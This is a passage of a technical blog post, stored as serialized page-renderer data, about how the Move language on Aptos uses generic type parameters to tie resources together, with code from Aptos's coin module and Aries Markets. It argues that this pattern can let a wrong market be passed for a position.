let",{"type":27,"tag":207,"props":13668,"children":13669},{"style":238},[13670],{"type":33,"value":686},{"type":27,"tag":207,"props":13672,"children":13673},{"style":220},[13674],{"type":33,"value":13675},"x_reserve_size",{"type":27,"tag":207,"props":13677,"children":13678},{"style":238},[13679],{"type":33,"value":1123},{"type":27,"tag":207,"props":13681,"children":13682},{"style":220},[13683],{"type":33,"value":13684},"y_reserve_size",{"type":27,"tag":207,"props":13686,"children":13687},{"style":238},[13688],{"type":33,"value":2222},{"type":27,"tag":207,"props":13690,"children":13691},{"style":226},[13692],{"type":33,"value":10380},{"type":27,"tag":207,"props":13694,"children":13695},{"style":220},[13696],{"type":33,"value":13697}," get_reserves_size",{"type":27,"tag":207,"props":13699,"children":13700},{"style":238},[13701],{"type":33,"value":9257},{"type":27,"tag":207,"props":13703,"children":13704},{"style":8920},[13705],{"type":33,"value":13415},{"type":27,"tag":207,"props":13707,"children":13708},{"style":238},[13709],{"type":33,"value":1123},{"type":27,"tag":207,"props":13711,"children":13712},{"style":8920},[13713],{"type":33,"value":13445},{"type":27,"tag":207,"props":13715,"children":13716},{"style":238},[13717],{"type":33,"value":13718},", LP>(",{"type":27,"tag":207,"props":13720,"children":13721},{"style":220},[13722],{"type":33,"value":13723},"pool_addr",{"type":27,"tag":207,"props":13725,"children":13726},{"style":238},[13727],{"type":33,"value":1455},{"type":27,"tag":36,"props":13729,"children":13730},{},[13731,13733,13739,13741,13748],{"type":33,"value":13732},"As an aside, this generic type information is implemented at runtime in the ",{"type":27,"tag":84,"props":13734,"children":13736},{"className":13735},[],[13737],{"type":33,"value":13738},"ty_args",{"type":33,"value":13740}," ",{"type":27,"tag":47,"props":13742,"children":13745},{"href":13743,"rel":13744},"https://github.com/move-language/move/blob/2412f877a5065132f31bfc339e6d1f2b9de10e87/language/move-vm/runtime/src/interpreter.rs#L88",[51],[13746],{"type":33,"value":13747},"at the vm level",{"type":33,"value":13749},". This VM level implementation choice makes it rather difficult to iterate over arbitrary generic types, such as with summing the coins in a pool. We will be releasing a deep dive into move's VM internals shortly.",{"type":27,"tag":36,"props":13751,"children":13752},{},[13753,13755,13761,13763,13769,13770,13776,13777,13783],{"type":33,"value":13754},"In pseucode, this checks that ",{"type":27,"tag":84,"props":13756,"children":13758},{"className":13757},[],[13759],{"type":33,"value":13760},"coin_x.type",{"type":33,"value":13762}," is equal to ",{"type":27,"tag":84,"props":13764,"children":13766},{"className":13765},[],[13767],{"type":33,"value":13768},"pool.x_type",{"type":33,"value":4601},{"type":27,"tag":84,"props":13771,"children":13773},{"className":13772},[],[13774],{"type":33,"value":13775},"coin_y.type",{"type":33,"value":13762},{"type":27,"tag":84,"props":13778,"children":13780},{"className":13779},[],[13781],{"type":33,"value":13782},"pool.y_type",{"type":33,"value":1041},{"type":27,"tag":36,"props":13785,"children":13786},{},[13787],{"type":33,"value":13788},"This type system has two advantages",{"type":27,"tag":12719,"props":13790,"children":13791},{},[13792,13804],{"type":27,"tag":1232,"props":13793,"children":13794},{},[13795,13797,13802],{"type":33,"value":13796},"It's required. The type parameter ",{"type":27,"tag":942,"props":13798,"children":13799},{},[13800],{"type":33,"value":13801},"must",{"type":33,"value":13803}," be specified so it's impossible to forget such a constraint",{"type":27,"tag":1232,"props":13805,"children":13806},{},[13807],{"type":33,"value":13808},"It's concise. Constraints are done via type parameter alignment instead of verbose equivalence checks",{"type":27,"tag":36,"props":13810,"children":13811},{},[13812],{"type":33,"value":13813},"However, this system isn't perfect.",{"type":27,"tag":36,"props":13815,"children":13816},{},[13817,13819,13824],{"type":33,"value":13818},"In fact, I would go as far as to argue that using types to create such associations is ",{"type":27,"tag":12606,"props":13820,"children":13821},{},[13822],{"type":33,"value":13823},"an anti-pattern",{"type":33,"value":1041},{"type":27,"tag":36,"props":13826,"children":13827},{},[13828,13830,13836],{"type":33,"value":13829},"Using types to enforce relationships only works because types are uniquely associated with instances. For example, in Aptos's coin initialization function, they explicitly assert that there hasn't been a previously initialized ",{"type":27,"tag":84,"props":13831,"children":13833},{"className":13832},[],[13834],{"type":33,"value":13835},"CoinInfo\u003CCoinType>",{"type":33,"value":1041},{"type":27,"tag":101,"props":13838,"children":13840},{"className":10270,"code":13839,"language":10269,"meta":7,"style":7}," fun initialize_internal\u003CCoinType>(\n // ...\n ): (BurnCapability\u003CCoinType>, FreezeCapability\u003CCoinType>, MintCapability\u003CCoinType>) {\n // ...\n\n assert!(\n !exists\u003CCoinInfo\u003CCoinType>>(account_addr),\n error::already_exists(ECOIN_INFO_ALREADY_PUBLISHED),\n );\n",[13841],{"type":27,"tag":84,"props":13842,"children":13843},{"__ignoreMap":7},[13844,13871,13879,13948,13955,13962,13974,14019,14041],{"type":27,"tag":207,"props":13845,"children":13846},{"class":209,"line":210},[13847,13852,13857,13861,13866],{"type":27,"tag":207,"props":13848,"children":13849},{"style":220},[13850],{"type":33,"value":13851}," fun",{"type":27,"tag":207,"props":13853,"children":13854},{"style":220},[13855],{"type":33,"value":13856}," initialize_internal",{"type":27,"tag":207,"props":13858,"children":13859},{"style":238},[13860],{"type":33,"value":9257},{"type":27,"tag":207,"props":13862,"children":13863},{"style":8920},[13864],{"type":33,"value":13865},"CoinType",{"type":27,"tag":207,"props":13867,"children":13868},{"style":238},[13869],{"type":33,"value":13870},">(\n",{"type":27,"tag":207,"props":13872,"children":13873},{"class":209,"line":244},[13874],{"type":27,"tag":207,"props":13875,"children":13876},{"style":4647},[13877],{"type":33,"value":13878}," // ...\n",{"type":27,"tag":207,"props":13880,"children":13881},{"class":209,"line":270},[13882,13887,13891,13895,13900,13904,13908,13913,13918,13922,13926,13930,13935,13939,13943],{"type":27,"tag":207,"props":13883,"children":13884},{"style":238},[13885],{"type":33,"value":13886}," )",{"type":27,"tag":207,"props":13888,"children":13889},{"style":226},[13890],{"type":33,"value":736},{"type":27,"tag":207,"props":13892,"children":13893},{"style":238},[13894],{"type":33,"value":686},{"type":27,"tag":207,"props":13896,"children":13897},{"style":8920},[13898],{"type":33,"value":13899},"BurnCapability",{"type":27,"tag":207,"props":13901,"children":13902},{"style":238},[13903],{"type":33,"value":9257},{"type":27,"tag":207,"props":13905,"children":13906},{"style":8920},[13907],{"type":33,"value":13865},{"type":27,"tag":207,"props":13909,"children":13910},{"style":238},[13911],{"type":33,"value":13912},">, ",{"type":27,"tag":207,"props":13914,"children":13915},{"style":8920},[13916],{"type":33,"value":13917},"FreezeCapability",{"type":27,"tag":207,"props":13919,"children":13920},{"style":238},[13921],{"type":33,"value":9257},{"type":27,"tag":207,"props":13923,"children":13924},{"style":8920},[13925],{"type":33,"value":13865},{"type":27,"tag":207,"props":13927,"children":13928},{"style":238},[13929],{"type":33,"value":13912},{"type":27,"tag":207,"props":13931,"children":13932},{"style":8920},[13933],{"type":33,"value":13934},"MintCapability",{"type":27,"tag":207,"props":13936,"children":13937},{"style":238},[13938],{"type":33,"value":9257},{"type":27,"tag":207,"props":13940,"children":13941},{"style":8920},[13942],{"type":33,"value":13865},{"type":27,"tag":207,"props":13944,"children":13945},{"style":238},[13946],{"type":33,"value":13947},">) {\n",{"type":27,"tag":207,"props":13949,"children":13950},{"class":209,"line":296},[13951],{"type":27,"tag":207,"props":13952,"children":13953},{"style":4647},[13954],{"type":33,"value":13878},{"type":27,"tag":207,"props":13956,"children":13957},{"class":209,"line":445},[13958],{"type":27,"tag":207,"props":13959,"children":13960},{"emptyLinePlaceholder":19},[13961],{"type":33,"value":2062},{"type":27,"tag":207,"props":13963,"children":13964},{"class":209,"line":867},[13965,13970],{"type":27,"tag":207,"props":13966,"children":13967},{"style":1335},[13968],{"type":33,"value":13969}," assert!",{"type":27,"tag":207,"props":13971,"children":13972},{"style":238},[13973],{"type":33,"value":9090},{"type":27,"tag":207,"props":13975,"children":13976},{"class":209,"line":892},[13977,13982,13987,13991,13996,14000,14004,14009,14014],{"type":27,"tag":207,"props":13978,"children":13979},{"style":226},[13980],{"type":33,"value":13981}," !",{"type":27,"tag":207,"props":13983,"children":13984},{"style":220},[13985],{"type":33,"value":13986},"exists",{"type":27,"tag":207,"props":13988,"children":13989},{"style":238},[13990],{"type":33,"value":9257},{"type":27,"tag":207,"props":13992,"children":13993},{"style":8920},[13994],{"type":33,"value":13995},"CoinInfo",{"type":27,"tag":207,"props":13997,"children":13998},{"style":238},[13999],{"type":33,"value":9257},{"type":27,"tag":207,"props":14001,"children":14002},{"style":8920},[14003],{"type":33,"value":13865},{"type":27,"tag":207,"props":14005,"children":14006},{"style":238},[14007],{"type":33,"value":14008},">>(",{"type":27,"tag":207,"props":14010,"children":14011},{"style":220},[14012],{"type":33,"value":14013},"account_addr",{"type":27,"tag":207,"props":14015,"children":14016},{"style":238},[14017],{"type":33,"value":14018},"),\n",{"type":27,"tag":207,"props":14020,"children":14021},{"class":209,"line":1475},[14022,14027,14031,14036],{"type":27,"tag":207,"props":14023,"children":14024},{"style":238},[14025],{"type":33,"value":14026}," error",{"type":27,"tag":207,"props":14028,"children":14029},{"style":226},[14030],{"type":33,"value":10768},{"type":27,"tag":207,"props":14032,"children":14033},{"style":1335},[14034],{"type":33,"value":14035},"already_exists",{"type":27,"tag":207,"props":14037,"children":14038},{"style":238},[14039],{"type":33,"value":14040},"(ECOIN_INFO_ALREADY_PUBLISHED),\n",{"type":27,"tag":207,"props":14042,"children":14043},{"class":209,"line":2065},[14044],{"type":27,"tag":207,"props":14045,"children":14046},{"style":238},[14047],{"type":33,"value":14048}," );\n",{"type":27,"tag":36,"props":14050,"children":14051},{},[14052,14054,14059],{"type":33,"value":14053},"While this ",{"type":27,"tag":84,"props":14055,"children":14057},{"className":14056},[],[14058],{"type":33,"value":13995},{"type":33,"value":14060}," isn't returned directly, it still ensures uniqueness of the capability objects.",{"type":27,"tag":36,"props":14062,"children":14063},{},[14064,14066,14073],{"type":33,"value":14065},"Similarly, consider ",{"type":27,"tag":47,"props":14067,"children":14070},{"href":14068,"rel":14069},"https://ariesmarkets.xyz/",[51],[14071],{"type":33,"value":14072},"Aries Markets",{"type":33,"value":14074},", a lending/borrowing protocol building on Aptos.",{"type":27,"tag":36,"props":14076,"children":14077},{},[14078,14080,14086],{"type":33,"value":14079},"Their ",{"type":27,"tag":84,"props":14081,"children":14083},{"className":14082},[],[14084],{"type":33,"value":14085},"ReserveCoinContainer",{"type":33,"value":14087}," struct stores all the relevant data and resources for managing a lending market.",{"type":27,"tag":101,"props":14089,"children":14091},{"className":10270,"code":14090,"language":10269,"meta":7,"style":7}," /// The struct to hold all the underlying `Coin`s.\n /// Stored as a resources.\n struct ReserveCoinContainer\u003Cphantom Coin0> has key {\n /// Stores the available `Coin`.\n underlying_coin: Coin\u003CCoin0>,\n /// Stores the LP `Coin` that act as collateral.\n collateralised_lp_coin: Coin\u003CLP\u003CCoin0>>,\n /// Mint capability for LP Coin.\n mint_capability: MintCapability\u003CLP\u003CCoin0>>,\n /// Burn capability for LP Coin.\n burn_capability: BurnCapability\u003CLP\u003CCoin0>>,\n\n // ...\n }\n\n",[14092],{"type":27,"tag":84,"props":14093,"children":14094},{"__ignoreMap":7},[14095,14103,14111,14152,14160,14189,14197,14234,14242,14279,14287,14324,14331,14338],{"type":27,"tag":207,"props":14096,"children":14097},{"class":209,"line":210},[14098],{"type":27,"tag":207,"props":14099,"children":14100},{"style":4647},[14101],{"type":33,"value":14102}," /// The struct to hold all the underlying `Coin`s.\n",{"type":27,"tag":207,"props":14104,"children":14105},{"class":209,"line":244},[14106],{"type":27,"tag":207,"props":14107,"children":14108},{"style":4647},[14109],{"type":33,"value":14110}," /// Stored as a resources.\n",{"type":27,"tag":207,"props":14112,"children":14113},{"class":209,"line":270},[14114,14118,14123,14127,14131,14136,14140,14144,14148],{"type":27,"tag":207,"props":14115,"children":14116},{"style":214},[14117],{"type":33,"value":13080},{"type":27,"tag":207,"props":14119,"children":14120},{"style":8920},[14121],{"type":33,"value":14122}," ReserveCoinContainer",{"type":27,"tag":207,"props":14124,"children":14125},{"style":238},[14126],{"type":33,"value":9257},{"type":27,"tag":207,"props":14128,"children":14129},{"style":220},[14130],{"type":33,"value":13094},{"type":27,"tag":207,"props":14132,"children":14133},{"style":8920},[14134],{"type":33,"value":14135}," Coin0",{"type":27,"tag":207,"props":14137,"children":14138},{"style":238},[14139],{"type":33,"value":9316},{"type":27,"tag":207,"props":14141,"children":14142},{"style":220},[14143],{"type":33,"value":13108},{"type":27,"tag":207,"props":14145,"children":14146},{"style":220},[14147],{"type":33,"value":13213},{"type":27,"tag":207,"props":14149,"children":14150},{"style":238},[14151],{"type":33,"value":384},{"type":27,"tag":207,"props":14153,"children":14154},{"class":209,"line":296},[14155],{"type":27,"tag":207,"props":14156,"children":14157},{"style":4647},[14158],{"type":33,"value":14159}," /// Stores the available `Coin`.\n",{"type":27,"tag":207,"props":14161,"children":14162},{"class":209,"line":445},[14163,14168,14172,14176,14180,14185],{"type":27,"tag":207,"props":14164,"children":14165},{"style":220},[14166],{"type":33,"value":14167}," underlying_coin",{"type":27,"tag":207,"props":14169,"children":14170},{"style":226},[14171],{"type":33,"value":736},{"type":27,"tag":207,"props":14173,"children":14174},{"style":8920},[14175],{"type":33,"value":13085},{"type":27,"tag":207,"props":14177,"children":14178},{"style":238},[14179],{"type":33,"value":9257},{"type":27,"tag":207,"props":14181,"children":14182},{"style":8920},[14183],{"type":33,"value":14184},"Coin0",{"type":27,"tag":207,"props":14186,"children":14187},{"style":238},[14188],{"type":33,"value":13420},{"type":27,"tag":207,"props":14190,"children":14191},{"class":209,"line":867},[14192],{"type":27,"tag":207,"props":14193,"children":14194},{"style":4647},[14195],{"type":33,"value":14196}," /// Stores the LP `Coin` that act as collateral.\n",{"type":27,"tag":207,"props":14198,"children":14199},{"class":209,"line":892},[14200,14205,14209,14213,14217,14221,14225,14229],{"type":27,"tag":207,"props":14201,"children":14202},{"style":220},[14203],{"type":33,"value":14204}," collateralised_lp_coin",{"type":27,"tag":207,"props":14206,"children":14207},{"style":226},[14208],{"type":33,"value":736},{"type":27,"tag":207,"props":14210,"children":14211},{"style":8920},[14212],{"type":33,"value":13085},{"type":27,"tag":207,"props":14214,"children":14215},{"style":238},[14216],{"type":33,"value":9257},{"type":27,"tag":207,"props":14218,"children":14219},{"style":8920},[14220],{"type":33,"value":13617},{"type":27,"tag":207,"props":14222,"children":14223},{"style":238},[14224],{"type":33,"value":9257},{"type":27,"tag":207,"props":14226,"children":14227},{"style":8920},[14228],{"type":33,"value":14184},{"type":27,"tag":207,"props":14230,"children":14231},{"style":238},[14232],{"type":33,"value":14233},">>,\n",{"type":27,"tag":207,"props":14235,"children":14236},{"class":209,"line":1475},[14237],{"type":27,"tag":207,"props":14238,"children":14239},{"style":4647},[14240],{"type":33,"value":14241}," /// Mint capability for LP Coin.\n",{"type":27,"tag":207,"props":14243,"children":14244},{"class":209,"line":2065},[14245,14250,14254,14259,14263,14267,14271,14275],{"type":27,"tag":207,"props":14246,"children":14247},{"style":220},[14248],{"type":33,"value":14249}," mint_capability",{"type":27,"tag":207,"props":14251,"children":14252},{"style":226},[14253],{"type":33,"value":736},{"type":27,"tag":207,"props":14255,"children":14256},{"style":8920},[14257],{"type":33,"value":14258}," MintCapability",{"type":27,"tag":207,"props":14260,"children":14261},{"style":238},[14262],{"type":33,"value":9257},{"type":27,"tag":207,"props":14264,"children":14265},{"style":8920},[14266],{"type":33,"value":13617},{"type":27,"tag":207,"props":14268,"children":14269},{"style":238},[14270],{"type":33,"value":9257},{"type":27,"tag":207,"props":14272,"children":14273},{"style":8920},[14274],{"type":33,"value":14184},{"type":27,"tag":207,"props":14276,"children":14277},{"style":238},[14278],{"type":33,"value":14233},{"type":27,"tag":207,"props":14280,"children":14281},{"class":209,"line":2092},[14282],{"type":27,"tag":207,"props":14283,"children":14284},{"style":4647},[14285],{"type":33,"value":14286}," /// Burn capability for LP Coin.\n",{"type":27,"tag":207,"props":14288,"children":14289},{"class":209,"line":2130},[14290,14295,14299,14304,14308,14312,14316,14320],{"type":27,"tag":207,"props":14291,"children":14292},{"style":220},[14293],{"type":33,"value":14294}," burn_capability",{"type":27,"tag":207,"props":14296,"children":14297},{"style":226},[14298],{"type":33,"value":736},{"type":27,"tag":207,"props":14300,"children":14301},{"style":8920},[14302],{"type":33,"value":14303}," BurnCapability",{"type":27,"tag":207,"props":14305,"children":14306},{"style":238},[14307],{"type":33,"value":9257},{"type":27,"tag":207,"props":14309,"children":14310},{"style":8920},[14311],{"type":33,"value":13617},{"type":27,"tag":207,"props":14313,"children":14314},{"style":238},[14315],{"type":33,"value":9257},{"type":27,"tag":207,"props":14317,"children":14318},{"style":8920},[14319],{"type":33,"value":14184},{"type":27,"tag":207,"props":14321,"children":14322},{"style":238},[14323],{"type":33,"value":14233},{"type":27,"tag":207,"props":14325,"children":14326},{"class":209,"line":2168},[14327],{"type":27,"tag":207,"props":14328,"children":14329},{"emptyLinePlaceholder":19},[14330],{"type":33,"value":2062},{"type":27,"tag":207,"props":14332,"children":14333},{"class":209,"line":4095},[14334],{"type":27,"tag":207,"props":14335,"children":14336},{"style":4647},[14337],{"type":33,"value":13878},{"type":27,"tag":207,"props":14339,"children":14340},{"class":209,"line":4103},[14341],{"type":27,"tag":207,"props":14342,"children":14343},{"style":238},[14344],{"type":33,"value":5312},{"type":27,"tag":36,"props":14346,"children":14347},{},[14348,14350,14355],{"type":33,"value":14349},"When creating a ",{"type":27,"tag":84,"props":14351,"children":14353},{"className":14352},[],[14354],{"type":33,"value":14085},{"type":33,"value":14356},", uniqueness is implicitly enforced by moving it into a hardcoded address.",{"type":27,"tag":101,"props":14358,"children":14360},{"className":10270,"code":14359,"language":10269,"meta":7,"style":7}," public(friend) fun create\u003CCoin0>(\n lp_store: &signer,\n // ...\n ) acquires Reserves {\n lp::assert_is_lp_store(signer::address_of(lp_store));\n\n // ...\n\n move_to(lp_store, ReserveCoinContainer\u003CCoin0> {\n // ...\n });\n",[14361],{"type":27,"tag":84,"props":14362,"children":14363},{"__ignoreMap":7},[14364,14407,14433,14440,14461,14506,14513,14520,14527,14564,14571],{"type":27,"tag":207,"props":14365,"children":14366},{"class":209,"line":210},[14367,14372,14376,14381,14385,14390,14395,14399,14403],{"type":27,"tag":207,"props":14368,"children":14369},{"style":1335},[14370],{"type":33,"value":14371}," public",{"type":27,"tag":207,"props":14373,"children":14374},{"style":238},[14375],{"type":33,"value":1343},{"type":27,"tag":207,"props":14377,"children":14378},{"style":220},[14379],{"type":33,"value":14380},"friend",{"type":27,"tag":207,"props":14382,"children":14383},{"style":238},[14384],{"type":33,"value":2222},{"type":27,"tag":207,"props":14386,"children":14387},{"style":220},[14388],{"type":33,"value":14389},"fun",{"type":27,"tag":207,"props":14391,"children":14392},{"style":220},[14393],{"type":33,"value":14394}," create",{"type":27,"tag":207,"props":14396,"children":14397},{"style":238},[14398],{"type":33,"value":9257},{"type":27,"tag":207,"props":14400,"children":14401},{"style":8920},[14402],{"type":33,"value":14184},{"type":27,"tag":207,"props":14404,"children":14405},{"style":238},[14406],{"type":33,"value":13870},{"type":27,"tag":207,"props":14408,"children":14409},{"class":209,"line":244},[14410,14415,14419,14424,14429],{"type":27,"tag":207,"props":14411,"children":14412},{"style":220},[14413],{"type":33,"value":14414}," lp_store",{"type":27,"tag":207,"props":14416,"children":14417},{"style":226},[14418],{"type":33,"value":736},{"type":27,"tag":207,"props":14420,"children":14421},{"style":226},[14422],{"type":33,"value":14423}," &",{"type":27,"tag":207,"props":14425,"children":14426},{"style":220},[14427],{"type":33,"value":14428},"signer",{"type":27,"tag":207,"props":14430,"children":14431},{"style":238},[14432],{"type":33,"value":1842},{"type":27,"tag":207,"props":14434,"children":14435},{"class":209,"line":270},[14436],{"type":27,"tag":207,"props":14437,"children":14438},{"style":4647},[14439],{"type":33,"value":13878},{"type":27,"tag":207,"props":14441,"children":14442},{"class":209,"line":296},[14443,14448,14452,14457],{"type":27,"tag":207,"props":14444,"children":14445},{"style":238},[14446],{"type":33,"value":14447}," ) ",{"type":27,"tag":207,"props":14449,"children":14450},{"style":220},[14451],{"type":33,"value":13626},{"type":27,"tag":207,"props":14453,"children":14454},{"style":8920},[14455],{"type":33,"value":14456}," Reserves",{"type":27,"tag":207,"props":14458,"children":14459},{"style":238},[14460],{"type":33,"value":384},{"type":27,"tag":207,"props":14462,"children":14463},{"class":209,"line":445},[14464,14469,14473,14478,14483,14487,14492,14496,14501],{"type":27,"tag":207,"props":14465,"children":14466},{"style":238},[14467],{"type":33,"value":14468}," lp",{"type":27,"tag":207,"props":14470,"children":14471},{"style":226},[14472],{"type":33,"value":10768},{"type":27,"tag":207,"props":14474,"children":14475},{"style":1335},[14476],{"type":33,"value":14477},"assert_is_lp_store",{"type":27,"tag":207,"props":14479,"children":14480},{"style":238},[14481],{"type":33,"value":14482},"(signer",{"type":27,"tag":207,"props":14484,"children":14485},{"style":226},[14486],{"type":33,"value":10768},{"type":27,"tag":207,"props":14488,"children":14489},{"style":1335},[14490],{"type":33,"value":14491},"address_of",{"type":27,"tag":207,"props":14493,"children":14494},{"style":238},[14495],{"type":33,"value":1343},{"type":27,"tag":207,"props":14497,"children":14498},{"style":220},[14499],{"type":33,"value":14500},"lp_store",{"type":27,"tag":207,"props":14502,"children":14503},{"style":238},[14504],{"type":33,"value":14505},"));\n",{"type":27,"tag":207,"props":14507,"children":14508},{"class":209,"line":867},[14509],{"type":27,"tag":207,"props":14510,"children":14511},{"emptyLinePlaceholder":19},[14512],{"type":33,"value":2062},{"type":27,"tag":207,"props":14514,"children":14515},{"class":209,"line":892},[14516],{"type":27,"tag":207,"props":14517,"children":14518},{"style":4647},[14519],{"type":33,"value":13878},{"type":27,"tag":207,"props":14521,"children":14522},{"class":209,"line":1475},[14523],{"type":27,"tag":207,"props":14524,"children":14525},{"emptyLinePlaceholder":19},[14526],{"type":33,"value":2062},{"type":27,"tag":207,"props":14528,"children":14529},{"class":209,"line":2065},[14530,14535,14539,14543,14547,14551,14555,14559],{"type":27,"tag":207,"props":14531,"children":14532},{"style":1335},[14533],{"type":33,"value":14534}," move_to",{"type":27,"tag":207,"props":14536,"children":14537},{"style":238},[14538],{"type":33,"value":1343},{"type":27,"tag":207,"props":14540,"children":14541},{"style":220},[14542],{"type":33,"value":14500},{"type":27,"tag":207,"props":14544,"children":14545},{"style":238},[14546],{"type":33,"value":1123},{"type":27,"tag":207,"props":14548,"children":14549},{"style":8920},[14550],{"type":33,"value":14085},{"type":27,"tag":207,"props":14552,"children":14553},{"style":238},[14554],{"type":33,"value":9257},{"type":27,"tag":207,"props":14556,"children":14557},{"style":8920},[14558],{"type":33,"value":14184},{"type":27,"tag":207,"props":14560,"children":14561},{"style":238},[14562],{"type":33,"value":14563},"> {\n",{"type":27,"tag":207,"props":14565,"children":14566},{"class":209,"line":2092},[14567],{"type":27,"tag":207,"props":14568,"children":14569},{"style":4647},[14570],{"type":33,"value":13457},{"type":27,"tag":207,"props":14572,"children":14573},{"class":209,"line":2130},[14574],{"type":27,"tag":207,"props":14575,"children":14576},{"style":238},[14577],{"type":33,"value":14578}," });\n",{"type":27,"tag":36,"props":14580,"children":14581},{},[14582],{"type":33,"value":14583},"In both these instances, type association only works because we create exactly one instance per type.",{"type":27,"tag":36,"props":14585,"children":14586},{},[14587,14589,14595,14597,14603,14605,14610],{"type":33,"value":14588},"On the other hand, consider if you have a ",{"type":27,"tag":84,"props":14590,"children":14592},{"className":14591},[],[14593],{"type":33,"value":14594},"Position\u003CT>",{"type":33,"value":14596}," and a ",{"type":27,"tag":84,"props":14598,"children":14600},{"className":14599},[],[14601],{"type":33,"value":14602},"Market\u003CT>",{"type":33,"value":14604}," where ",{"type":27,"tag":84,"props":14606,"children":14608},{"className":14607},[],[14609],{"type":33,"value":13269},{"type":33,"value":14611}," is the coin type.",{"type":27,"tag":101,"props":14613,"children":14615},{"className":10270,"code":14614,"language":10269,"meta":7,"style":7}," struct Market\u003Cphantom T> {\n reserves: Coin\u003CT>,\n // ...\n }\n\n struct Position\u003Cphantom T> {\n amount: u64,\n // ...\n }\n",[14616],{"type":27,"tag":84,"props":14617,"children":14618},{"__ignoreMap":7},[14619,14647,14675,14682,14689,14696,14724,14744,14751],{"type":27,"tag":207,"props":14620,"children":14621},{"class":209,"line":210},[14622,14626,14631,14635,14639,14643],{"type":27,"tag":207,"props":14623,"children":14624},{"style":214},[14625],{"type":33,"value":13334},{"type":27,"tag":207,"props":14627,"children":14628},{"style":8920},[14629],{"type":33,"value":14630}," Market",{"type":27,"tag":207,"props":14632,"children":14633},{"style":238},[14634],{"type":33,"value":9257},{"type":27,"tag":207,"props":14636,"children":14637},{"style":220},[14638],{"type":33,"value":13094},{"type":27,"tag":207,"props":14640,"children":14641},{"style":8920},[14642],{"type":33,"value":13200},{"type":27,"tag":207,"props":14644,"children":14645},{"style":238},[14646],{"type":33,"value":14563},{"type":27,"tag":207,"props":14648,"children":14649},{"class":209,"line":244},[14650,14655,14659,14663,14667,14671],{"type":27,"tag":207,"props":14651,"children":14652},{"style":220},[14653],{"type":33,"value":14654}," reserves",{"type":27,"tag":207,"props":14656,"children":14657},{"style":226},[14658],{"type":33,"value":736},{"type":27,"tag":207,"props":14660,"children":14661},{"style":8920},[14662],{"type":33,"value":13085},{"type":27,"tag":207,"props":14664,"children":14665},{"style":238},[14666],{"type":33,"value":9257},{"type":27,"tag":207,"props":14668,"children":14669},{"style":8920},[14670],{"type":33,"value":13269},{"type":27,"tag":207,"props":14672,"children":14673},{"style":238},[14674],{"type":33,"value":13420},{"type":27,"tag":207,"props":14676,"children":14677},{"class":209,"line":270},[14678],{"type":27,"tag":207,"props":14679,"children":14680},{"style":4647},[14681],{"type":33,"value":13457},{"type":27,"tag":207,"props":14683,"children":14684},{"class":209,"line":296},[14685],{"type":27,"tag":207,"props":14686,"children":14687},{"style":238},[14688],{"type":33,"value":10645},{"type":27,"tag":207,"props":14690,"children":14691},{"class":209,"line":445},[14692],{"type":27,"tag":207,"props":14693,"children":14694},{"emptyLinePlaceholder":19},[14695],{"type":33,"value":2062},{"type":27,"tag":207,"props":14697,"children":14698},{"class":209,"line":867},[14699,14703,14708,14712,14716,14720],{"type":27,"tag":207,"props":14700,"children":14701},{"style":214},[14702],{"type":33,"value":13334},{"type":27,"tag":207,"props":14704,"children":14705},{"style":8920},[14706],{"type":33,"value":14707}," Position",{"type":27,"tag":207,"props":14709,"children":14710},{"style":238},[14711],{"type":33,"value":9257},{"type":27,"tag":207,"props":14713,"children":14714},{"style":220},[14715],{"type":33,"value":13094},{"type":27,"tag":207,"props":14717,"children":14718},{"style":8920},[14719],{"type":33,"value":13200},{"type":27,"tag":207,"props":14721,"children":14722},{"style":238},[14723],{"type":33,"value":14563},{"type":27,"tag":207,"props":14725,"children":14726},{"class":209,"line":892},[14727,14732,14736,14740],{"type":27,"tag":207,"props":14728,"children":14729},{"style":220},[14730],{"type":33,"value":14731}," amount",{"type":27,"tag":207,"props":14733,"children":14734},{"style":226},[14735],{"type":33,"value":736},{"type":27,"tag":207,"props":14737,"children":14738},{"style":8920},[14739],{"type":33,"value":13142},{"type":27,"tag":207,"props":14741,"children":14742},{"style":238},[14743],{"type":33,"value":1842},{"type":27,"tag":207,"props":14745,"children":14746},{"class":209,"line":1475},[14747],{"type":27,"tag":207,"props":14748,"children":14749},{"style":4647},[14750],{"type":33,"value":13457},{"type":27,"tag":207,"props":14752,"children":14753},{"class":209,"line":2065},[14754],{"type":27,"tag":207,"props":14755,"children":14756},{"style":238},[14757],{"type":33,"value":10645},{"type":27,"tag":36,"props":14759,"children":14760},{},[14761,14763,14768,14770,14775],{"type":33,"value":14762},"If ",{"type":27,"tag":84,"props":14764,"children":14766},{"className":14765},[],[14767],{"type":33,"value":14602},{"type":33,"value":14769}," isn't a unique type -- or in other words if you're able to create more than one instance of a market per type ",{"type":27,"tag":84,"props":14771,"children":14773},{"className":14772},[],[14774],{"type":33,"value":13269},{"type":33,"value":14776}," -- you might be able to pass in the incorrect market for a given position. This is a common vulnerability pattern on Solana.",{"type":27,"tag":36,"props":14778,"children":14779},{},[14780],{"type":33,"value":14781},"Dynamic iteration of types is also impossible (at least as currently designed by the Move VM) leading to massive headaches for developers. In these scenarios, we empirically observe developers defaulting back to type reflection APIs, complicating code unnecessarily. Security at the expense of usability comes at the expense of security.",{"type":27,"tag":101,"props":14783,"children":14785},{"className":10270,"code":14784,"language":10269,"meta":7,"style":7}," /// Get the price of the token per lamport.\n public fun get_price(type_info: TypeInfo): Decimal acquires Oracle {\n let oracle = borrow_global_mut\u003COracle>(@oracle);\n let price = table::borrow_mut_with_default\u003CTypeInfo, Decimal>(\n &mut oracle.prices,\n type_info,\n decimal::one()\n );\n *price\n }\n",[14786],{"type":27,"tag":84,"props":14787,"children":14788},{"__ignoreMap":7},[14789,14797,14859,14908,14960,14985,14997,15019,15027,15040],{"type":27,"tag":207,"props":14790,"children":14791},{"class":209,"line":210},[14792],{"type":27,"tag":207,"props":14793,"children":14794},{"style":4647},[14795],{"type":33,"value":14796}," /// Get the price of the token per lamport.\n",{"type":27,"tag":207,"props":14798,"children":14799},{"class":209,"line":244},[14800,14805,14809,14814,14818,14823,14827,14832,14836,14840,14845,14850,14855],{"type":27,"tag":207,"props":14801,"children":14802},{"style":220},[14803],{"type":33,"value":14804}," public",{"type":27,"tag":207,"props":14806,"children":14807},{"style":220},[14808],{"type":33,"value":13489},{"type":27,"tag":207,"props":14810,"children":14811},{"style":1335},[14812],{"type":33,"value":14813}," 